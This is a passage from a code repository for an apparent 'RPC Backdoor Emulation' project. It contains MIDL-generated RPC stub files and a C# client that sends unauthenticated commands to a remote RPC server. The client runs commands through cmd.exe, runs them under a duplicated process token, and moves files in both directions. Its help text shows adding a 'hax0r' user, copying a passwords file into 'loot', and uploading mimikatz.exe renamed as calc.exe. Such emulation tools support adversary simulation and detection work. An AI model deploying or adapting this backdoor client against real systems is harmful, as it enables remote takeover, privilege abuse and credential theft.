{ 102 | 103 | NdrClientCall3( 104 | ( PMIDL_STUBLESS_PROXY_INFO )&RpcServerInterface2_ProxyInfo, 105 | 0, 106 | 0, 107 | 0); 108 | 109 | } 110 | 111 | 112 | #if !defined(__RPC_WIN64__) 113 | #error Invalid build platform for this stub. 114 | #endif 115 | 116 | static const RpcServerInterface2_MIDL_PROC_FORMAT_STRING RpcServerInterface2__MIDL_ProcFormatString = 117 | { 118 | 0, 119 | { 120 | 121 | /* Procedure Shutdown2 */ 122 | 123 | 0x32, /* FC_BIND_PRIMITIVE */ 124 | 0x48, /* Old Flags: */ 125 | /* 2 */ NdrFcLong( 0x0 ), /* 0 */ 126 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 127 | /* 8 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 128 | /* 10 */ NdrFcShort( 0x0 ), /* 0 */ 129 | /* 12 */ NdrFcShort( 0x0 ), /* 0 */ 130 | /* 14 */ 0x40, /* Oi2 Flags: has ext, */ 131 | 0x0, /* 0 */ 132 | /* 16 */ 0xa, /* 10 */ 133 | 0x1, /* Ext Flags: new corr desc, */ 134 | /* 18 */ NdrFcShort( 0x0 ), /* 0 */ 135 | /* 20 */ NdrFcShort( 0x0 ), /* 0 */ 136 | /* 22 */ NdrFcShort( 0x0 ), /* 0 */ 137 | /* 24 */ NdrFcShort( 0x0 ), /* 0 */ 138 | 139 | 0x0 140 | } 141 | }; 142 | 143 | static const RpcServerInterface2_MIDL_TYPE_FORMAT_STRING RpcServerInterface2__MIDL_TypeFormatString = 144 | { 145 | 0, 146 | { 147 | NdrFcShort( 0x0 ), /* 0 */ 148 | 149 | 0x0 150 | } 151 | }; 152 | 153 | static const unsigned short RpcServerInterface2_FormatStringOffsetTable[] = 154 | { 155 | 0 156 | }; 157 | 158 | 159 | 160 | #endif /* defined(_M_AMD64)*/ 161 | 162 | 163 | 164 | /* this ALWAYS GENERATED file contains the RPC client stubs */ 165 | 166 | 167 | /* File created by MIDL compiler version 8.01.0622 */ 168 | /* at Mon Jan 18 21:14:07 2038 169 | */ 170 | /* Compiler settings for RpcServerInterface2.idl: 171 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 172 | protocol : all , ms_ext, c_ext, robust 173 | error checks: allocation ref bounds_check enum stub_data 174 | VC __declspec() decoration level: 175 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 176 | DECLSPEC_UUID(), MIDL_INTERFACE() 177 | */ 178 | /* @@MIDL_FILE_HEADING( ) */ 179 | 180 | #if defined(_M_AMD64) 181 | 182 | 183 | 184 | 185 | #if !defined(__RPC_WIN64__) 186 | #error Invalid build platform for this stub. 187 | #endif 188 | 189 | 190 | #include "ndr64types.h" 191 | #include "pshpack8.h" 192 | 193 | 194 | typedef 195 | struct 196 | { 197 | struct _NDR64_PROC_FORMAT frag1; 198 | } 199 | __midl_frag2_t; 200 | extern const __midl_frag2_t __midl_frag2; 201 | 202 | typedef 203 | NDR64_FORMAT_UINT32 204 | __midl_frag1_t; 205 | extern const __midl_frag1_t __midl_frag1; 206 | 207 | static const __midl_frag2_t __midl_frag2 = 208 | { 209 | /* Shutdown2 */ 210 | { 211 | /* Shutdown2 */ /* procedure Shutdown2 */ 212 | (NDR64_UINT32) 66 /* 0x42 */, /* primitive handle */ /* IsIntrepreted */ 213 | (NDR64_UINT32) 0 /* 0x0 */ , /* Stack size */ 214 | (NDR64_UINT32) 0 /* 0x0 */, 215 | (NDR64_UINT32) 0 /* 0x0 */, 216 | (NDR64_UINT16) 0 /* 0x0 */, 217 | (NDR64_UINT16) 0 /* 0x0 */, 218 | (NDR64_UINT16) 0 /* 0x0 */, 219 | (NDR64_UINT16) 0 /* 0x0 */ 220 | } 221 | }; 222 | 223 | static const __midl_frag1_t __midl_frag1 = 224 | (NDR64_UINT32) 0 /* 0x0 */; 225 | 226 | 227 | #include "poppack.h" 228 | 229 | 230 | static const FormatInfoRef RpcServerInterface2_Ndr64ProcTable[] = 231 | { 232 | &__midl_frag2 233 | }; 234 | 235 | 236 | static const MIDL_STUB_DESC RpcServerInterface2_StubDesc = 237 | { 238 | (void *)& RpcServerInterface2___RpcClientInterface, 239 | MIDL_user_allocate, 240 | MIDL_user_free, 241 | &hRpcServerInterface2Binding, 242 | 0, 243 | 0, 244 | 0, 245 | 0, 246 | RpcServerInterface2__MIDL_TypeFormatString.Format, 247 | 1, /* -error bounds_check flag */ 248 | 0x60001, /* Ndr library version */ 249 | 0, 250 | 0x801026e, /* MIDL Version 8.1.622 */ 251 | 0, 252 | 0, 253 | 0, /* notify & notify_flag routine table */ 254 | 0x2000001, /* MIDL flag */ 255 | 0, /* cs routines */ 256 | (void *)& RpcServerInterface2_ProxyInfo, /* proxy/server info */ 257 | 0 258 | }; 259 | 260 | static const MIDL_SYNTAX_INFO RpcServerInterface2_SyntaxInfo [ 2 ] = 261 | { 262 | { 263 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 264 | 0, 265 | RpcServerInterface2__MIDL_ProcFormatString.Format, 266 | RpcServerInterface2_FormatStringOffsetTable, 267 | RpcServerInterface2__MIDL_TypeFormatString.Format, 268 | 0, 269 | 0, 270 | 0 271 | } 272 | ,{ 273 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 274 | 0, 275 | 0 , 276 | (unsigned short *) RpcServerInterface2_Ndr64ProcTable, 277 | 0, 278 | 0, 279 | 0, 280 | 0 281 | } 282 | }; 283 | 284 | static const MIDL_STUBLESS_PROXY_INFO RpcServerInterface2_ProxyInfo = 285 | { 286 | &RpcServerInterface2_StubDesc, 287 | RpcServerInterface2__MIDL_ProcFormatString.Format, 288 | RpcServerInterface2_FormatStringOffsetTable, 289 | (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax, 290 | 2, 291 | (MIDL_SYNTAX_INFO*)RpcServerInterface2_SyntaxInfo 292 | 293 | }; 294 | 295 | #if _MSC_VER >= 1200 296 | #pragma warning(pop) 297 | #endif 298 | 299 | 300 | #endif /* defined(_M_AMD64)*/ 301 | 302 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2_s.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface2.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 29 | 30 | #include 31 | #include "RpcServerInterface2.h" 32 | 33 | #define TYPE_FORMAT_STRING_SIZE 3 34 | #define PROC_FORMAT_STRING_SIZE 27 35 | #define EXPR_FORMAT_STRING_SIZE 1 36 | #define TRANSMIT_AS_TABLE_SIZE 0 37 | #define WIRE_MARSHAL_TABLE_SIZE 0 38 | 39 | typedef struct _RpcServerInterface2_MIDL_TYPE_FORMAT_STRING 40 | { 41 | short Pad; 42 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 43 | } RpcServerInterface2_MIDL_TYPE_FORMAT_STRING; 44 | 45 | typedef struct _RpcServerInterface2_MIDL_PROC_FORMAT_STRING 46 | { 47 | short Pad; 48 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 49 | } RpcServerInterface2_MIDL_PROC_FORMAT_STRING; 50 | 51 | typedef struct _RpcServerInterface2_MIDL_EXPR_FORMAT_STRING 52 | { 53 | long Pad; 54 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 55 | } RpcServerInterface2_MIDL_EXPR_FORMAT_STRING; 56 | 57 | 58 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 59 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 60 | 61 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 62 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 63 | 64 | 65 | extern const RpcServerInterface2_MIDL_TYPE_FORMAT_STRING RpcServerInterface2__MIDL_TypeFormatString; 66 | extern const RpcServerInterface2_MIDL_PROC_FORMAT_STRING RpcServerInterface2__MIDL_ProcFormatString; 67 | extern const RpcServerInterface2_MIDL_EXPR_FORMAT_STRING RpcServerInterface2__MIDL_ExprFormatString; 68 | 69 | /* Standard interface: RpcServerInterface2, ver. 1.0, 70 | GUID={0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x18}} */ 71 | 72 | 73 | extern const MIDL_SERVER_INFO RpcServerInterface2_ServerInfo; 74 | 75 | extern const RPC_DISPATCH_TABLE RpcServerInterface2_v1_0_DispatchTable; 76 | 77 | static const RPC_SERVER_INTERFACE RpcServerInterface2___RpcServerInterface = 78 | { 79 | sizeof(RPC_SERVER_INTERFACE), 80 | {{0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x18}},{1,0}}, 81 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 82 | (RPC_DISPATCH_TABLE*)&RpcServerInterface2_v1_0_DispatchTable, 83 | 0, 84 | 0, 85 | 0, 86 | &RpcServerInterface2_ServerInfo, 87 | 0x06000000 88 | }; 89 | RPC_IF_HANDLE RpcServerInterface2_v1_0_s_ifspec = (RPC_IF_HANDLE)& RpcServerInterface2___RpcServerInterface; 90 | 91 | extern const MIDL_STUB_DESC RpcServerInterface2_StubDesc; 92 | 93 | 94 | #if !defined(__RPC_WIN64__) 95 | #error Invalid build platform for this stub. 96 | #endif 97 | 98 | static const RpcServerInterface2_MIDL_PROC_FORMAT_STRING RpcServerInterface2__MIDL_ProcFormatString = 99 | { 100 | 0, 101 | { 102 | 103 | /* Procedure Shutdown2 */ 104 | 105 | 0x32, /* FC_BIND_PRIMITIVE */ 106 | 0x48, /* Old Flags: */ 107 | /* 2 */ NdrFcLong( 0x0 ), /* 0 */ 108 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 109 | /* 8 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 110 | /* 10 */ NdrFcShort( 0x0 ), /* 0 */ 111 | /* 12 */ NdrFcShort( 0x0 ), /* 0 */ 112 | /* 14 */ 0x40, /* Oi2 Flags: has ext, */ 113 | 0x0, /* 0 */ 114 | /* 16 */ 0xa, /* 10 */ 115 | 0x1, /* Ext Flags: new corr desc, */ 116 | /* 18 */ NdrFcShort( 0x0 ), /* 0 */ 117 | /* 20 */ NdrFcShort( 0x0 ), /* 0 */ 118 | /* 22 */ NdrFcShort( 0x0 ), /* 0 */ 119 | /* 24 */ NdrFcShort( 0x0 ), /* 0 */ 120 | 121 | 0x0 122 | } 123 | }; 124 | 125 | static const RpcServerInterface2_MIDL_TYPE_FORMAT_STRING RpcServerInterface2__MIDL_TypeFormatString = 126 | { 127 | 0, 128 | { 129 | NdrFcShort( 0x0 ), /* 0 */ 130 | 131 | 0x0 132 | } 133 | }; 134 | 135 | static const unsigned short RpcServerInterface2_FormatStringOffsetTable[] = 136 | { 137 | 0 138 | }; 139 | 140 | 141 | static const RPC_DISPATCH_FUNCTION RpcServerInterface2_table[] = 142 | { 143 | NdrServerCall2, 144 | 0 145 | }; 146 | static const RPC_DISPATCH_TABLE RpcServerInterface2_v1_0_DispatchTable = 147 | { 148 | 1, 149 | (RPC_DISPATCH_FUNCTION*)RpcServerInterface2_table 150 | }; 151 | 152 | 153 | #endif /* defined(_M_AMD64)*/ 154 | 155 | 156 | 157 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 158 | 159 | 160 | /* File created by MIDL compiler version 8.01.0622 */ 161 | /* at Mon Jan 18 21:14:07 2038 162 | */ 163 | /* Compiler settings for RpcServerInterface2.idl: 164 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 165 | protocol : all , ms_ext, c_ext, robust 166 | error checks: allocation ref bounds_check enum stub_data 167 | VC __declspec() decoration level: 168 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 169 | DECLSPEC_UUID(), MIDL_INTERFACE() 170 | */ 171 | /* @@MIDL_FILE_HEADING( ) */ 172 | 173 | #if defined(_M_AMD64) 174 | 175 | 176 | 177 | 178 | #if !defined(__RPC_WIN64__) 179 | #error Invalid build platform for this stub. 180 | #endif 181 | 182 | 183 | #include "ndr64types.h" 184 | #include "pshpack8.h" 185 | 186 | 187 | typedef 188 | struct 189 | { 190 | struct _NDR64_PROC_FORMAT frag1; 191 | } 192 | __midl_frag2_t; 193 | extern const __midl_frag2_t __midl_frag2; 194 | 195 | typedef 196 | NDR64_FORMAT_UINT32 197 | __midl_frag1_t; 198 | extern const __midl_frag1_t __midl_frag1; 199 | 200 | static const __midl_frag2_t __midl_frag2 = 201 | { 202 | /* Shutdown2 */ 203 | { 204 | /* Shutdown2 */ /* procedure Shutdown2 */ 205 | (NDR64_UINT32) 66 /* 0x42 */, /* primitive handle */ /* IsIntrepreted */ 206 | (NDR64_UINT32) 0 /* 0x0 */ , /* Stack size */ 207 | (NDR64_UINT32) 0 /* 0x0 */, 208 | (NDR64_UINT32) 0 /* 0x0 */, 209 | (NDR64_UINT16) 0 /* 0x0 */, 210 | (NDR64_UINT16) 0 /* 0x0 */, 211 | (NDR64_UINT16) 0 /* 0x0 */, 212 | (NDR64_UINT16) 0 /* 0x0 */ 213 | } 214 | }; 215 | 216 | static const __midl_frag1_t __midl_frag1 = 217 | (NDR64_UINT32) 0 /* 0x0 */; 218 | 219 | 220 | #include "poppack.h" 221 | 222 | 223 | static const FormatInfoRef RpcServerInterface2_Ndr64ProcTable[] = 224 | { 225 | &__midl_frag2 226 | }; 227 | 228 | 229 | static const MIDL_STUB_DESC RpcServerInterface2_StubDesc = 230 | { 231 | (void *)& RpcServerInterface2___RpcServerInterface, 232 | MIDL_user_allocate, 233 | MIDL_user_free, 234 | 0, 235 | 0, 236 | 0, 237 | 0, 238 | 0, 239 | RpcServerInterface2__MIDL_TypeFormatString.Format, 240 | 1, /* -error bounds_check flag */ 241 | 0x60001, /* Ndr library version */ 242 | 0, 243 | 0x801026e, /* MIDL Version 8.1.622 */ 244 | 0, 245 | 0, 246 | 0, /* notify & notify_flag routine table */ 247 | 0x2000001, /* MIDL flag */ 248 | 0, /* cs routines */ 249 | (void *)& RpcServerInterface2_ServerInfo, /* proxy/server info */ 250 | 0 251 | }; 252 | 253 | static const RPC_DISPATCH_FUNCTION RpcServerInterface2_NDR64__table[] = 254 | { 255 | NdrServerCallAll, 256 | 0 257 | }; 258 | static const RPC_DISPATCH_TABLE RpcServerInterface2_NDR64__v1_0_DispatchTable = 259 | { 260 | 1, 261 | (RPC_DISPATCH_FUNCTION*)RpcServerInterface2_NDR64__table 262 | }; 263 | 264 | static const MIDL_SYNTAX_INFO RpcServerInterface2_SyntaxInfo [ 2 ] = 265 | { 266 | { 267 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 268 | (RPC_DISPATCH_TABLE*)&RpcServerInterface2_v1_0_DispatchTable, 269 | RpcServerInterface2__MIDL_ProcFormatString.Format, 270 | RpcServerInterface2_FormatStringOffsetTable, 271 | RpcServerInterface2__MIDL_TypeFormatString.Format, 272 | 0, 273 | 0, 274 | 0 275 | } 276 | ,{ 277 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 278 | (RPC_DISPATCH_TABLE*)&RpcServerInterface2_NDR64__v1_0_DispatchTable, 279 | 0 , 280 | (unsigned short *) RpcServerInterface2_Ndr64ProcTable, 281 | 0, 282 | 0, 283 | 0, 284 | 0 285 | } 286 | }; 287 | 288 | 289 | static const SERVER_ROUTINE RpcServerInterface2_ServerRoutineTable[] = 290 | { 291 | (SERVER_ROUTINE)Shutdown2 292 | }; 293 | 294 | static const MIDL_SERVER_INFO RpcServerInterface2_ServerInfo = 295 | { 296 | &RpcServerInterface2_StubDesc, 297 | RpcServerInterface2_ServerRoutineTable, 298 | RpcServerInterface2__MIDL_ProcFormatString.Format, 299 | (unsigned short *) RpcServerInterface2_FormatStringOffsetTable, 300 | 0, 301 | (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax, 302 | 2, 303 | (MIDL_SYNTAX_INFO*)RpcServerInterface2_SyntaxInfo 304 | }; 305 | #if _MSC_VER >= 1200 306 | #pragma warning(pop) 307 | #endif 308 | 309 | 310 | #endif /* defined(_M_AMD64)*/ 311 | 312 | -------------------------------------------------------------------------------- /RpcSharpClient/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /RpcSharpClient/ILMerge.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | true 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /RpcSharpClient/ILMergeOrder.txt: -------------------------------------------------------------------------------- 1 | # this file contains the partial list of the merged assemblies in the merge order 2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build 3 | # and finetune merge order to your satisfaction 4 | 5 | -------------------------------------------------------------------------------- /RpcSharpClient/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Collections.Generic; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using rpc_fa161e81_6e93_4f41_961c_ee9c2e75de17_1_0; 8 | 9 | namespace RpcSharpClient 10 | { 11 | internal class Program 12 | { 13 | static void PrintHelp() 14 | { 15 | Console.Write("RPC Backdoor Emulation\n"); 16 | Console.Write("\n"); 17 | Console.Write("Target information:\n"); 18 | Console.Write(" --protocol\n"); 19 | Console.Write(" Can be 'tcp' for RPC over TCP/IP or 'namedpipe' for RPC over Named Pipes \n"); 20 | Console.Write(" --hostname\n"); 21 | Console.Write(" Specifies the hostname or IP address of the target RPC server\n"); 22 | Console.Write(" --port\n"); 23 | Console.Write(" Specifies the port number of the target RPC server (required for TCP)\n"); 24 | Console.Write(" --pipename\n"); 25 | Console.Write(" Specifies the pipe name of the target RPC server (required for named pipes)\n"); 26 | Console.Write("\n"); 27 | Console.Write("Functions:\n"); 28 | Console.Write(" The function to be executed is passed via the --function argument.\n"); 29 | Console.Write(" The following functions are implemented:\n"); 30 | Console.Write(" * execute\n"); 31 | Console.Write(" * executewithtoken\n"); 32 | Console.Write(" * download\n"); 33 | Console.Write(" * upload\n"); 34 | Console.Write(" * shutdown\n"); 35 | Console.Write(" \n"); 36 | Console.Write(" Execute\n"); 37 | Console.Write(" The execute function executes a command using 'cmd.exe /c ...'.\n"); 38 | Console.Write(" The --command argument is required. If the commands contains any spaces, wrap it in double quotes (\").\n"); 39 | Console.Write(" \n"); 40 | Console.Write(" Execute with token\n"); 41 | Console.Write(" The execute with token function duplicates the token of a given process ID and executes a command using 'cmd.exe /c ...' via the CreateProcessWithTokenW function.\n"); 42 | Console.Write(" The --command argument is required. If the commands contains any spaces, wrap it in double quotes (\").\n"); 43 | Console.Write(" The --pid argument is required. This argument specifies the process ID of which the token will be duplicated. Make sure the RPC server run in a security context with the permissions and privileges required.\n"); 44 | Console.Write(" \n"); 45 | Console.Write(" Download\n"); 46 | Console.Write(" The download function downloads a file from the RPC server and saves it locally. The file is Base64 encoded/decoded in the process.\n"); 47 | Console.Write(" The --remotepath argument specifies the path of the file to be downloaded (used by the server to read the file).\n"); 48 | Console.Write(" The --localpath argument specifies the path of the file to be saved (used by the client to save the file).\n"); 49 | Console.Write("\n"); 50 | Console.Write(" Upload\n"); 51 | Console.Write(" The upload function uploaded a file to the RPC server and saves it remotely. The file is Base64 encoded/decoded in the process.\n"); 52 | Console.Write(" The --remotepath argument specifies the path of the file to be uploaded (used by the server to save the file).\n"); 53 | Console.Write(" The --localpath argument specifies the path of the file to be uploaded (used by the client to read the file).\n"); 54 | Console.Write(" \n"); 55 | Console.Write(" Shutdown\n"); 56 | Console.Write(" The shutdown function instructs the RPC server to terminate the RPC server and exit the thread.\n"); 57 | Console.Write(" \n"); 58 | Console.Write("Examples:\n"); 59 | Console.Write(" Execute a command:\n"); 60 | Console.Write(" RpcSharpClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function execute --command \"net user hax0r /add\"\n"); 61 | Console.Write(" \n"); 62 | Console.Write(" Execute a command with the token of a process with the ID 1220:\n"); 63 | Console.Write(" RpcSharpClient.exe --protocol tcp --hostname 192.168.70.130 --port 4747 --function executewithtoken --command \"net user hax0r /add\" --pid 1220\n"); 64 | Console.Write(" \n"); 65 | Console.Write(" Download a file:\n"); 66 | Console.Write(" RpcSharpClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function download --localpath \"loot\\passwords.txt\" --remotepath \"secrets\\passwords.txt\"\n"); 67 | Console.Write(" \n"); 68 | Console.Write(" Upload a file:\n"); 69 | Console.Write(" RpcSharpClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function upload --localpath \"Tools\\mimikatz.exe\" --remotepath \"calc.exe\"\n"); 70 | Console.Write(""); 71 | } 72 | 73 | 74 | static void Main(string[] args) 75 | { 76 | string protocol = null; 77 | string endpoint = null; 78 | string hostname = null; 79 | string function = null; 80 | string command = null; 81 | string pid = null; 82 | string remotepath = null; 83 | string localpath = null; 84 | string data = null; 85 | string protocol_seq = null; 86 | 87 | // If not enough arguments are provided, print help and exit 88 | if (args.Length < 2) 89 | { 90 | PrintHelp(); 91 | return; 92 | } 93 | 94 | // Parse command line arguments 95 | for (int i = 0; i < args.Length; i += 2) 96 | { 97 | // Every flag is expected to be followed by a value 98 | if (i + 1 >= args.Length) 99 | { 100 | Console.WriteLine("Error: Incorrent number of arguments. See instructions below."); 101 | PrintHelp(); 102 | return; 103 | } 104 | 105 | // Parse all expected arguments 106 | if (string.Compare("--protocol", args[i]) == 0) 107 | { 108 | protocol = args[i + 1]; 109 | } 110 | else if (string.Compare("--pipename", args[i]) == 0) 111 | { 112 | endpoint = args[i + 1]; 113 | } 114 | else if (string.Compare("--hostname", args[i]) == 0) 115 | { 116 | hostname = args[i + 1]; 117 | } 118 | else if (string.Compare("--port", args[i]) == 0) 119 | { 120 | endpoint = args[i + 1]; 121 | } 122 | else if (string.Compare("--function", args[i]) == 0) 123 | { 124 | function = args[i + 1]; 125 | } 126 | else if (string.Compare("--command", args[i]) == 0) 127 | { 128 | command = args[i + 1]; 129 | } 130 | else if (string.Compare("--pid", args[i]) == 0) 131 | { 132 | pid = args[i + 1]; 133 | } 134 | else if (string.Compare("--remotepath", args[i]) == 0) 135 | { 136 | remotepath = args[i + 1]; 137 | } 138 | else if (string.Compare("--localpath", args[i]) == 0) 139 | { 140 | localpath = args[i + 1]; 141 | } 142 | else if (string.Compare("--data", args[i]) == 0) 143 | { 144 | data = args[i + 1]; 145 | } 146 | } 147 | 148 | // TCP must be accompanied by a hostname and a port 149 | if (string.Compare(protocol, "tcp") == 0) 150 | { 151 | if (hostname == null || endpoint == null) 152 | { 153 | Console.WriteLine("Error: TCP requires providing a hostname/IP address and a port. See instructions below."); 154 | PrintHelp(); 155 | return; 156 | } 157 | else 158 | { 159 | protocol_seq = "ncacn_ip_tcp"; 160 | } 161 | } 162 | // named pipes must be accompanied by a hostname and a pipename 163 | else if (string.Compare(protocol, "namedpipe") == 0) 164 | { 165 | if (endpoint == null || hostname == null) 166 | { 167 | Console.WriteLine("Error: Named pipe requires providing a hostname and a pipe name. See instructions below."); 168 | PrintHelp(); 169 | return; 170 | } 171 | else 172 | { 173 | protocol_seq = "ncacn_np"; 174 | } 175 | } 176 | 177 | // Establish a connection 178 | Client client = new Client(); 179 | NtApiDotNet.SecurityQualityOfService qos = new NtApiDotNet.SecurityQualityOfService(NtApiDotNet.SecurityImpersonationLevel.Anonymous, NtApiDotNet.SecurityContextTrackingMode.Static, false); 180 | qos.ImpersonationLevel = NtApiDotNet.SecurityImpersonationLevel.Identification; 181 | qos.EffectiveOnly = false; 182 | qos.ContextTrackingMode = NtApiDotNet.SecurityContextTrackingMode.Static; 183 | NtApiDotNet.Win32.Rpc.Transport.RpcTransportSecurity rts = new NtApiDotNet.Win32.Rpc.Transport.RpcTransportSecurity(qos); 184 | rts.AuthenticationLevel = NtApiDotNet.Win32.Rpc.Transport.RpcAuthenticationLevel.None; 185 | try 186 | { 187 | client.Connect(protocol_seq, endpoint, hostname, rts); 188 | } 189 | catch(Exception e) 190 | { 191 | Console.WriteLine("Failed to establish a connection: {0}", e.Message); 192 | } 193 | 194 | try 195 | { 196 | // The execute call must be accompanied by a command 197 | if (string.Compare(function, "execute") == 0) 198 | { 199 | if (command == null) 200 | { 201 | Console.WriteLine("Error: The execute command requires providing a command. See instructions below."); 202 | PrintHelp(); 203 | } 204 | else 205 | { 206 | string output = ""; 207 | Console.WriteLine("[+] Sending Execute command: {0}", command); 208 | client.Execute(command, out output); 209 | Console.WriteLine("[+] Execute command result: {0}", output); 210 | } 211 | } 212 | // The executewithtoken call must be accompanied by a command and a pid 213 | else if (string.Compare(function, "executewithtoken") == 0) 214 | { 215 | if (command == null || pid == null) 216 | { 217 | Console.WriteLine("Error: The execute command requires providing a command and a process id (pid). See instructions below."); 218 | PrintHelp(); 219 | } 220 | else 221 | { 222 | int processId; 223 | if (int.TryParse(pid, out processId) == false) 224 | { 225 | Console.WriteLine("Invalid process ID was provided: {0}", pid); 226 | } 227 | else 228 | { 229 | string output = ""; 230 | Console.WriteLine("[+] Sending Execute command: {0}", command); 231 | client.ExecuteWithToken(command, processId, out output); 232 | Console.WriteLine("[+] Execute command result: {0}", output); 233 | } 234 | } 235 | } 236 | // The download call must be accompanied by a localpath and a remotepath 237 | else if (string.Compare(function, "download") == 0) 238 | { 239 | if (localpath == null || remotepath == null) 240 | { 241 | Console.WriteLine("Error: The download command requires providing a remote path (remotepath) for the file to download and a local path (localpath) where the file will be saved. See instructions below."); 242 | PrintHelp(); 243 | } 244 | else 245 | { 246 | string output = null; 247 | Console.WriteLine("[+] Sending Download command: {0}", remotepath); 248 | client.Download(remotepath, out output); 249 | Console.WriteLine("[+] Saving to file:", localpath); 250 | File.WriteAllBytes(localpath, Convert.FromBase64String(output)); 251 | } 252 | } 253 | // The upload call must be accompanied by a localpath and a remotepath 254 | else if (string.Compare(function, "upload") == 0) 255 | { 256 | if (localpath == null || remotepath == null) 257 | { 258 | Console.WriteLine("Error: The upload command requires providing a local path (localpath) for the file to upload and a remote path (remotepath) where the file will be saved on the remote system. See instructions below."); 259 | PrintHelp(); 260 | } 261 | else 262 | { 263 | byte[] file = File.ReadAllBytes(localpath); 264 | string encodedFile = Convert.ToBase64String(file); 265 | Console.WriteLine("[+] Sending Upload command: ", remotepath); 266 | client.Upload(remotepath, encodedFile); 267 | Console.WriteLine("[+] Upload complete: {0} bytes sent", file.Length); 268 | } 269 | } 270 | // The shutdown call doesn't require any additional arguments 271 | else if (string.Compare(function, "shutdown") == 0) 272 | { 273 | client.Shutdown(); 274 | } 275 | } 276 | catch (Exception e) 277 | { 278 | Console.WriteLine("Runtime error: {0}", e.Message); 279 | } 280 | finally 281 | { 282 | client.Disconnect(); 283 | } 284 | } 285 | } 286 | } 287 | -------------------------------------------------------------------------------- /RpcSharpClient/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("RpcSharpClient")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("RpcSharpClient")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: 